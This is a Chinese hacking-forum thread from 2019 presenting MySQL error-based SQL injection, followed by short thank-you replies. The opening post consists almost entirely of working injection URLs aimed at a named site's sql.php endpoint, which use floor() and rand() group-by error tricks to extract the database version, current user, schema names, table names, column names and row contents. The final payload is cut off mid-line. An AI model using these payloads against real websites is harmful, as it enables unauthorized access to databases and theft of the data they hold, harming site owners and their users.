加QQ81758415
快捷导航

[渗透测试] MySQL报错提醒注入方法

[复制链接]
查看: 520|回复: 5

3万

主题

0

帖子

232

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
232
发表于 2019-5-21 23:37:29 | 显示全部楼层 |阅读模式
mysql暴错引入方式梳理,根据floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方式
SQL引入
1、根据floor暴错
/*数据表板本*/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*简易方法暴库*/
http://www.waitalone.cn/sql.php?id=info()
/*联接客户*/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*连接数据库*/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴库*/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴表*/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴字符串*/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴內容*/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0


回复

使用道具 举报

0

主题

9

帖子

18

积分

新手上路

Rank: 1

积分
18
发表于 2019-5-21 23:39:47 | 显示全部楼层
祝黑客联盟越做越好,加油
回复

使用道具 举报

0

主题

6

帖子

12

积分

新手上路

Rank: 1

积分
12
发表于 2019-5-22 05:04:04 | 显示全部楼层
感谢楼主,支持黑客啦论坛!
回复

使用道具 举报

0

主题

13

帖子

26

积分

新手上路

Rank: 1

积分
26
发表于 2019-5-22 06:07:23 | 显示全部楼层
抢沙发支持黑客啦论坛!
回复

使用道具 举报

0

主题

8

帖子

16

积分

新手上路

Rank: 1

积分
16
发表于 2019-5-22 08:50:55 | 显示全部楼层
被电了呜呜支持黑客啦论坛!
回复

使用道具 举报

0

主题

5

帖子

10

积分

新手上路

Rank: 1

积分
10
发表于 2019-5-22 11:17:51 | 显示全部楼层
太感动了,分享这么好的软件
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

精彩推荐

让创业更简单

  • 反馈建议:hackhl@outlook.com
  • 客服电话:暂时没有
  • 工作时间:周一到周五9点~22点

云服务支持

黑客联盟,快速搜索

关注我们

Copyright 黑客联盟安全防护网  Powered by©  技术支持:    ( 闽ICP备18000419号-1 )